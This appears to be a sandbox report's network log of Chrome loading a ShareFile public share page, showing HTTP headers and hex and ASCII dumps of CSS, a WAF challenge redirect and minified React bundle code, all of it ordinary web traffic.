                                                                                                                                                                                                                      2024-11-05 19:36:00 UTC16384INData Raw: 74 69 6f 6e 22 3a 0d 0a 32 32 65 66 0d 0a 22 44 6f 63 20 67 65 6e 20 70 69 6c 65 74 22 2c 22 6c 69 6e 6b 22 3a 22 68 74 74 70 73 3a 2f 2f 70 69 6c 65 74 66 65 65 64 2d 63 64 6e 2e 73 68 61 72 65 66 69 6c 65 2e 69 6f 2f 73 68 61 72 65 66 69 6c 65 2d 77 65 62 2f 73 68 61 72 65 66 69 6c 65 64 65 76 2d 64 6f 63 2d 67 65 6e 2d 70 69 6c 65 74 2f 31 2e 32 2e 31 30 35 2f 70 61 63 6b 61 67 65 2f 64 69 73 74 2f 69 6e 64 65 78 2e 6a 73 22 2c 22 63 75 73 74 6f 6d 22 3a 7b 22 74 68 69 72 64 50 61 72 74 79 4c 69 63 65 6e 73 65 73 50 61 74 68 22 3a 22 64 69 73 74 2f 74 68 69 72 64 70 61 72 74 79 2e 74 78 74 22 2c 22 74 68 69 72 64 50 61 72 74 79 4c 69 63 65 6e 73 65 73 4c 69 6e 6b 22 3a 22 68 74 74 70 73 3a 2f 2f 70 69 6c 65 74 66 65 65 64 2d 63 64 6e 2e 73 68 61 72 65
                                                                                                                                                                                                                      Data Ascii: tion":22ef"Doc gen pilet","link":"https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-doc-gen-pilet/1.2.105/package/dist/index.js","custom":{"thirdPartyLicensesPath":"dist/thirdparty.txt","thirdPartyLicensesLink":"https://piletfeed-cdn.share
                                                                                                                                                                                                                      2024-11-05 19:36:00 UTC10INData Raw: 69 72 65 52 65 66 22 3a 0d 0a
                                                                                                                                                                                                                      Data Ascii: ireRef":


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      1192.168.2.174970613.248.193.2514437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:35:59 UTC1270OUTGET /css/spinner.css HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sharefile.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Referer: https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      Cookie: AWSALBTG=5LPRMPAF0UjPp7QhxKLs5naNhMW8MwLRnUYOQ27ahbiKIOuZFQGNO+9KZ6xXwnOzocd7OTcta3nn+mg7xy87RuOxYWXCvrvsRM4mTDCagjoJ/ihCLQ1jpx/76vcTHZ6f4UNjzLfQ2moabk5pXNIWgt24xhlOzTQ1Cwe9AH+pffFo; AWSALBTGCORS=5LPRMPAF0UjPp7QhxKLs5naNhMW8MwLRnUYOQ27ahbiKIOuZFQGNO+9KZ6xXwnOzocd7OTcta3nn+mg7xy87RuOxYWXCvrvsRM4mTDCagjoJ/ihCLQ1jpx/76vcTHZ6f4UNjzLfQ2moabk5pXNIWgt24xhlOzTQ1Cwe9AH+pffFo; AWSALB=Snmn8pj0ZZ4uwxWtCZA3b0YHXcyu6K1Dlsief7t6XpBhPBE6HGa0tHCx/ffca3Z9HH7MtpPeOshsr0JBxIWo/HX69JyKONtlRtfJGLY3/Y+94W8Av55n50UqsDd5; AWSALBCORS=Snmn8pj0ZZ4uwxWtCZA3b0YHXcyu6K1Dlsief7t6XpBhPBE6HGa0tHCx/ffca3Z9HH7MtpPeOshsr0JBxIWo/HX69JyKONtlRtfJGLY3/Y+94W8Av55n50UqsDd5
                                                                                                                                                                                                                      2024-11-05 19:36:00 UTC1415INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:35:59 GMT
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 1247
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=7NQ3qANfjcNldCo/D4VMWzza0f2Ig2K578l4QPO+SFkRrjyy9dLqkGQT+GQvw1nxDQ2gbRf2R3sFiz+nU8KPPgRXkh9up5qd6UlKw4ju+UYjlY/qW0U3hx48V/T+BTDd+zbPNf3YFKiFl5yZRq2W/1PTyeeoIKFhTUa670lN9fV9; Expires=Tue, 12 Nov 2024 19:35:59 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=7NQ3qANfjcNldCo/D4VMWzza0f2Ig2K578l4QPO+SFkRrjyy9dLqkGQT+GQvw1nxDQ2gbRf2R3sFiz+nU8KPPgRXkh9up5qd6UlKw4ju+UYjlY/qW0U3hx48V/T+BTDd+zbPNf3YFKiFl5yZRq2W/1PTyeeoIKFhTUa670lN9fV9; Expires=Tue, 12 Nov 2024 19:35:59 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=baEYrqmkfpbdO40bTHu3knPMluYu0f11/b6erumHx8FhurkHe+iMOzF04ujcT0DR2AO1Fo8OXcyUTWyA5nJJ/4lOqZQYIasGrQxs4n4o0dLMgbYhJ2trDQ8iDz+g; Expires=Tue, 12 Nov 2024 19:35:59 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=baEYrqmkfpbdO40bTHu3knPMluYu0f11/b6erumHx8FhurkHe+iMOzF04ujcT0DR2AO1Fo8OXcyUTWyA5nJJ/4lOqZQYIasGrQxs4n4o0dLMgbYhJ2trDQ8iDz+g; Expires=Tue, 12 Nov 2024 19:35:59 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      ETag: "1db2f60e56c2b5f"
                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                      X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                      2024-11-05 19:36:00 UTC1247INData Raw: 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 6c 6f 61 64 69 6e 67 20 7b 0a 09 30 25 20 7b 0a 09 09 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 0a 09 7d 0a 09 31 30 30 25 20 7b 0a 09 09 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 36 30 64 65 67 29 3b 0a 09 7d 0a 20 20 7d 0a 0a 20 20 40 6b 65 79 66 72 61 6d 65 73 20 6c 6f 61 64 69 6e 67 20 7b 0a 09 20 20 30 25 20 7b 0a 09 09 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 0a 09 20 20 7d 0a 09 20 20 31 30 30 25 20 7b 0a 09 09 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 36 30 64 65 67 29 3b 0a 09 20 20 7d 0a 20 20 7d 0a 0a 20 20 2e 6c 6f 61 64 69 6e 67 2d 69 6e 2d 70 72 6f 67 72 65 73 73 20 7b 0a 09 2d 77 65 62 6b
                                                                                                                                                                                                                      Data Ascii: @-webkit-keyframes loading {0% {transform: rotate(0deg);}100% {transform: rotate(60deg);} } @keyframes loading { 0% { transform: rotate(0deg); } 100% { transform: rotate(60deg); } } .loading-in-progress {-webk


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      2192.168.2.174970713.32.121.34437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:00 UTC539OUTGET /0093b71e39a6/478ed03bbf12/challenge.js HTTP/1.1
                                                                                                                                                                                                                      Host: 0093b71e39a6.us-east-1.sdk.awswaf.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:01 UTC614INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                      Server: CloudFront
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:00 GMT
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Access-Control-Allow-Headers: *
                                                                                                                                                                                                                      Access-Control-Allow-Methods: *
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      Access-Control-Max-Age: 86400
                                                                                                                                                                                                                      Cache-Control: max-age=86400
                                                                                                                                                                                                                      Location: https://0093b71e39a6.11de9b12.us-east-1.token.awswaf.com/0093b71e39a6/478ed03bbf12/challenge.js
                                                                                                                                                                                                                      X-Cache: FunctionGeneratedResponse from cloudfront
                                                                                                                                                                                                                      Via: 1.1 a300dbfb49a2eb50edb83038642c9f82.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA60-P1
                                                                                                                                                                                                                      X-Amz-Cf-Id: k7MagmovC4I_VwIkEPLvseR1jbc-gkvezOIx9AAwdrbCvrTYo5Ar2g==


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      3192.168.2.174971113.248.193.2514437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:00 UTC1278OUTGET /bundles/index.073b02341601d3e1503c.js HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sharefile.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Referer: https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      Cookie: AWSALBTG=5LPRMPAF0UjPp7QhxKLs5naNhMW8MwLRnUYOQ27ahbiKIOuZFQGNO+9KZ6xXwnOzocd7OTcta3nn+mg7xy87RuOxYWXCvrvsRM4mTDCagjoJ/ihCLQ1jpx/76vcTHZ6f4UNjzLfQ2moabk5pXNIWgt24xhlOzTQ1Cwe9AH+pffFo; AWSALBTGCORS=5LPRMPAF0UjPp7QhxKLs5naNhMW8MwLRnUYOQ27ahbiKIOuZFQGNO+9KZ6xXwnOzocd7OTcta3nn+mg7xy87RuOxYWXCvrvsRM4mTDCagjoJ/ihCLQ1jpx/76vcTHZ6f4UNjzLfQ2moabk5pXNIWgt24xhlOzTQ1Cwe9AH+pffFo; AWSALB=Snmn8pj0ZZ4uwxWtCZA3b0YHXcyu6K1Dlsief7t6XpBhPBE6HGa0tHCx/ffca3Z9HH7MtpPeOshsr0JBxIWo/HX69JyKONtlRtfJGLY3/Y+94W8Av55n50UqsDd5; AWSALBCORS=Snmn8pj0ZZ4uwxWtCZA3b0YHXcyu6K1Dlsief7t6XpBhPBE6HGa0tHCx/ffca3Z9HH7MtpPeOshsr0JBxIWo/HX69JyKONtlRtfJGLY3/Y+94W8Av55n50UqsDd5
                                                                                                                                                                                                                      2024-11-05 19:36:01 UTC1432INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:00 GMT
                                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                                      Content-Length: 4720901
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=vgr/kmD7ZnauzugPZGrZDOkUm6uOcZ4iv3x76rbYA7/GIvcybmZB/cc9Jk9uRdlUUhI51NsKVZoNAT6v037pmiY8GYORXG/LU37XIyab4YvWAlB2XKA+uYizRUPoM95aT3Y744CutnuPjqkLMyOqI0xVKCw7pbOobgqxuoZK/isG; Expires=Tue, 12 Nov 2024 19:36:00 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=vgr/kmD7ZnauzugPZGrZDOkUm6uOcZ4iv3x76rbYA7/GIvcybmZB/cc9Jk9uRdlUUhI51NsKVZoNAT6v037pmiY8GYORXG/LU37XIyab4YvWAlB2XKA+uYizRUPoM95aT3Y744CutnuPjqkLMyOqI0xVKCw7pbOobgqxuoZK/isG; Expires=Tue, 12 Nov 2024 19:36:00 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=QJQ9WTjlNQmmupqnyu8qPECPLnnozQ4/rXFxky35zxmTlAcDsmR2YLyRVfsJCPoosSubLg4IKvDjRFhGes6S2uvzNJita1Ltt4HR5/tUlcBg9njA48AxH15edaM/; Expires=Tue, 12 Nov 2024 19:36:00 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=QJQ9WTjlNQmmupqnyu8qPECPLnnozQ4/rXFxky35zxmTlAcDsmR2YLyRVfsJCPoosSubLg4IKvDjRFhGes6S2uvzNJita1Ltt4HR5/tUlcBg9njA48AxH15edaM/; Expires=Tue, 12 Nov 2024 19:36:00 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      ETag: "1db2f60e5242685"
                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                      X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                      2024-11-05 19:36:01 UTC14952INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 69 6e 64 65 78 2e 30 37 33 62 30 32 33 34 31 36 30 31 64 33 65 31 35 30 33 63 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 6f 3d 7b 36 31 32 34 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 69 4e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 78 7d 2c 52 5f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 2c 45 56 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 7d 2c 65 7a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 7d 7d 29 3b 76 61 72 20
                                                                                                                                                                                                                      Data Ascii: /*! For license information please see index.073b02341601d3e1503c.js.LICENSE.txt */!function(){var e,t,n,r,o={61242:function(e,t,n){"use strict";n.d(t,{iN:function(){return x},R_:function(){return y},EV:function(){return E},ez:function(){return b}});var
                                                                                                                                                                                                                      2024-11-05 19:36:01 UTC16384INData Raw: 65 2c 45 2c 45 2c 30 2c 30 2c 6f 2c 6c 2c 62 2c 6f 2c 77 3d 5b 5d 2c 64 2c 53 29 2c 53 29 2c 6f 2c 53 2c 64 2c 6c 2c 72 3f 77 3a 53 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 42 65 28 78 2c 45 2c 45 2c 45 2c 5b 22 22 5d 2c 53 2c 30 2c 6c 2c 53 29 7d 7d 73 3d 75 3d 70 3d 30 2c 68 3d 67 3d 31 2c 62 3d 78 3d 22 22 2c 64 3d 61 3b 62 72 65 61 6b 3b 63 61 73 65 20 35 38 3a 64 3d 31 2b 76 65 28 78 29 2c 70 3d 6d 3b 64 65 66 61 75 6c 74 3a 69 66 28 68 3c 31 29 69 66 28 31 32 33 3d 3d 79 29 2d 2d 68 3b 65 6c 73 65 20 69 66 28 31 32 35 3d 3d 79 26 26 30 3d 3d 68 2b 2b 26 26 31 32 35 3d 3d 4f 65 28 29 29 63 6f 6e 74 69 6e 75 65 3b 73 77 69 74 63 68 28 78 2b 3d 75 65 28 79 29 2c 79 2a 68 29 7b 63 61 73 65 20 33 38 3a 67 3d 75 3e 30 3f 31 3a 28 78 2b 3d 22 5c 66
                                                                                                                                                                                                                      Data Ascii: e,E,E,0,0,o,l,b,o,w=[],d,S),S),o,S,d,l,r?w:S);break;default:Be(x,E,E,E,[""],S,0,l,S)}}s=u=p=0,h=g=1,b=x="",d=a;break;case 58:d=1+ve(x),p=m;default:if(h<1)if(123==y)--h;else if(125==y&&0==h++&&125==Oe())continue;switch(x+=ue(y),y*h){case 38:g=u>0?1:(x+="\f
                                                                                                                                                                                                                      2024-11-05 19:36:01 UTC941INData Raw: 38 2e 38 20 31 37 36 2d 31 37 36 2d 37 38 2e 38 2d 31 37 36 2d 31 37 36 2d 31 37 36 7a 6d 30 20 32 38 38 63 2d 36 31 2e 39 20 30 2d 31 31 32 2d 35 30 2e 31 2d 31 31 32 2d 31 31 32 73 35 30 2e 31 2d 31 31 32 20 31 31 32 2d 31 31 32 20 31 31 32 20 35 30 2e 31 20 31 31 32 20 31 31 32 2d 35 30 2e 31 20 31 31 32 2d 31 31 32 20 31 31 32 7a 22 7d 7d 5d 7d 2c 6e 61 6d 65 3a 22 65 79 65 22 2c 74 68 65 6d 65 3a 22 6f 75 74 6c 69 6e 65 64 22 7d 2c 61 3d 6e 28 32 37 30 32 39 29 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 61 2e 5a 2c 28 30 2c 72 2e 5a 29 28 7b 7d 2c 65 2c 7b 72 65 66 3a 74 2c 69 63 6f 6e 3a 69 7d 29 29 7d 3b 76 61 72 20 63 3d 6f 2e 66 6f 72 77 61 72 64 52 65 66 28 6c 29 7d 2c
                                                                                                                                                                                                                      Data Ascii: 8.8 176-176-78.8-176-176-176zm0 288c-61.9 0-112-50.1-112-112s50.1-112 112-112 112 50.1 112 112-50.1 112-112 112z"}}]},name:"eye",theme:"outlined"},a=n(27029),l=function(e,t){return o.createElement(a.Z,(0,r.Z)({},e,{ref:t,icon:i}))};var c=o.forwardRef(l)},
                                                                                                                                                                                                                      2024-11-05 19:36:01 UTC16384INData Raw: 76 69 65 77 42 6f 78 3a 22 36 34 20 36 34 20 38 39 36 20 38 39 36 22 2c 66 6f 63 75 73 61 62 6c 65 3a 22 66 61 6c 73 65 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 7b 74 61 67 3a 22 70 61 74 68 22 2c 61 74 74 72 73 3a 7b 64 3a 22 4d 37 32 34 20 32 31 38 2e 33 56 31 34 31 63 30 2d 36 2e 37 2d 37 2e 37 2d 31 30 2e 34 2d 31 32 2e 39 2d 36 2e 33 4c 32 36 30 2e 33 20 34 38 36 2e 38 61 33 31 2e 38 36 20 33 31 2e 38 36 20 30 20 30 30 30 20 35 30 2e 33 6c 34 35 30 2e 38 20 33 35 32 2e 31 63 35 2e 33 20 34 2e 31 20 31 32 2e 39 2e 34 20 31 32 2e 39 2d 36 2e 33 76 2d 37 37 2e 33 63 30 2d 34 2e 39 2d 32 2e 33 2d 39 2e 36 2d 36 2e 31 2d 31 32 2e 36 6c 2d 33 36 30 2d 32 38 31 20 33 36 30 2d 32 38 31 2e 31 63 33 2e 38 2d 33 20 36 2e 31 2d 37 2e 37 20 36 2e 31 2d 31 32 2e 36
                                                                                                                                                                                                                      Data Ascii: viewBox:"64 64 896 896",focusable:"false"},children:[{tag:"path",attrs:{d:"M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 000 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6
                                                                                                                                                                                                                      2024-11-05 19:36:01 UTC16384INData Raw: 7a 65 47 65 74 74 65 72 3b 74 68 69 73 2e 5f 63 65 6c 6c 43 6f 75 6e 74 3d 74 2c 74 68 69 73 2e 5f 65 73 74 69 6d 61 74 65 64 43 65 6c 6c 53 69 7a 65 3d 6e 2c 74 68 69 73 2e 5f 63 65 6c 6c 53 69 7a 65 47 65 74 74 65 72 3d 72 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 43 65 6c 6c 43 6f 75 6e 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 63 65 6c 6c 43 6f 75 6e 74 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 45 73 74 69 6d 61 74 65 64 43 65 6c 6c 53 69 7a 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 65 73 74 69 6d 61 74 65 64 43 65 6c 6c 53 69 7a 65 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 4c 61 73 74 4d 65 61 73 75 72 65 64 49 6e 64 65 78 22 2c 76 61 6c 75 65 3a 66 75 6e
                                                                                                                                                                                                                      Data Ascii: zeGetter;this._cellCount=t,this._estimatedCellSize=n,this._cellSizeGetter=r}},{key:"getCellCount",value:function(){return this._cellCount}},{key:"getEstimatedCellSize",value:function(){return this._estimatedCellSize}},{key:"getLastMeasuredIndex",value:fun
                                                                                                                                                                                                                      2024-11-05 19:36:01 UTC16384INData Raw: 6f 75 6e 74 3a 65 2e 63 6f 6c 75 6d 6e 43 6f 75 6e 74 2c 70 72 65 76 69 6f 75 73 43 65 6c 6c 53 69 7a 65 3a 65 2e 63 6f 6c 75 6d 6e 57 69 64 74 68 2c 70 72 65 76 69 6f 75 73 53 63 72 6f 6c 6c 54 6f 41 6c 69 67 6e 6d 65 6e 74 3a 65 2e 73 63 72 6f 6c 6c 54 6f 41 6c 69 67 6e 6d 65 6e 74 2c 70 72 65 76 69 6f 75 73 53 63 72 6f 6c 6c 54 6f 49 6e 64 65 78 3a 65 2e 73 63 72 6f 6c 6c 54 6f 43 6f 6c 75 6d 6e 2c 70 72 65 76 69 6f 75 73 53 69 7a 65 3a 65 2e 77 69 64 74 68 2c 73 63 72 6f 6c 6c 4f 66 66 73 65 74 3a 6d 2c 73 63 72 6f 6c 6c 54 6f 41 6c 69 67 6e 6d 65 6e 74 3a 73 2c 73 63 72 6f 6c 6c 54 6f 49 6e 64 65 78 3a 75 2c 73 69 7a 65 3a 66 2c 73 69 7a 65 4a 75 73 74 49 6e 63 72 65 61 73 65 64 46 72 6f 6d 5a 65 72 6f 3a 62 2c 75 70 64 61 74 65 53 63 72 6f 6c 6c 49
                                                                                                                                                                                                                      Data Ascii: ount:e.columnCount,previousCellSize:e.columnWidth,previousScrollToAlignment:e.scrollToAlignment,previousScrollToIndex:e.scrollToColumn,previousSize:e.width,scrollOffset:m,scrollToAlignment:s,scrollToIndex:u,size:f,sizeJustIncreasedFromZero:b,updateScrollI
                                                                                                                                                                                                                      2024-11-05 19:36:01 UTC16384INData Raw: 65 6e 64 65 72 65 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 63 6f 6c 75 6d 6e 53 74 61 72 74 49 6e 64 65 78 2c 72 3d 65 2e 63 6f 6c 75 6d 6e 53 74 6f 70 49 6e 64 65 78 2c 6f 3d 65 2e 72 6f 77 53 74 61 72 74 49 6e 64 65 78 2c 69 3d 65 2e 72 6f 77 53 74 6f 70 49 6e 64 65 78 3b 6e 2e 5f 63 6f 6c 75 6d 6e 53 74 61 72 74 49 6e 64 65 78 3d 74 2c 6e 2e 5f 63 6f 6c 75 6d 6e 53 74 6f 70 49 6e 64 65 78 3d 72 2c 6e 2e 5f 72 6f 77 53 74 61 72 74 49 6e 64 65 78 3d 6f 2c 6e 2e 5f 72 6f 77 53 74 6f 70 49 6e 64 65 78 3d 69 7d 29 29 2c 6e 7d 72 65 74 75 72 6e 28 30 2c 66 2e 5a 29 28 74 2c 65 29 2c 28 30 2c 73 2e 5a 29 28 74 2c 5b 7b 6b 65 79 3a 22 73 65 74 53 63 72 6f 6c 6c 49 6e 64 65 78 65 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                      Data Ascii: endered",(function(e){var t=e.columnStartIndex,r=e.columnStopIndex,o=e.rowStartIndex,i=e.rowStopIndex;n._columnStartIndex=t,n._columnStopIndex=r,n._rowStartIndex=o,n._rowStopIndex=i})),n}return(0,f.Z)(t,e),(0,s.Z)(t,[{key:"setScrollIndexes",value:function
                                                                                                                                                                                                                      2024-11-05 19:36:01 UTC16384INData Raw: 72 6f 6c 6c 54 6f 70 2c 61 3d 74 2e 70 72 6f 70 73 2c 6c 3d 61 2e 68 65 69 67 68 74 3b 28 30 2c 61 2e 6f 6e 53 63 72 6f 6c 6c 29 28 7b 63 6c 69 65 6e 74 48 65 69 67 68 74 3a 6c 2c 63 6c 69 65 6e 74 57 69 64 74 68 3a 61 2e 77 69 64 74 68 2c 73 63 72 6f 6c 6c 48 65 69 67 68 74 3a 6f 2c 73 63 72 6f 6c 6c 4c 65 66 74 3a 6e 2c 73 63 72 6f 6c 6c 54 6f 70 3a 72 2c 73 63 72 6f 6c 6c 57 69 64 74 68 3a 69 7d 29 7d 2c 69 6e 64 69 63 65 73 3a 7b 73 63 72 6f 6c 6c 4c 65 66 74 3a 6e 2c 73 63 72 6f 6c 6c 54 6f 70 3a 72 7d 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 73 65 74 53 63 72 6f 6c 6c 50 6f 73 69 74 69 6f 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 73 63 72 6f 6c 6c 4c 65 66 74 2c 6e 3d 65 2e 73 63 72 6f 6c 6c 54 6f 70 2c 72 3d
                                                                                                                                                                                                                      Data Ascii: rollTop,a=t.props,l=a.height;(0,a.onScroll)({clientHeight:l,clientWidth:a.width,scrollHeight:o,scrollLeft:n,scrollTop:r,scrollWidth:i})},indices:{scrollLeft:n,scrollTop:r}})}},{key:"_setScrollPosition",value:function(e){var t=e.scrollLeft,n=e.scrollTop,r=
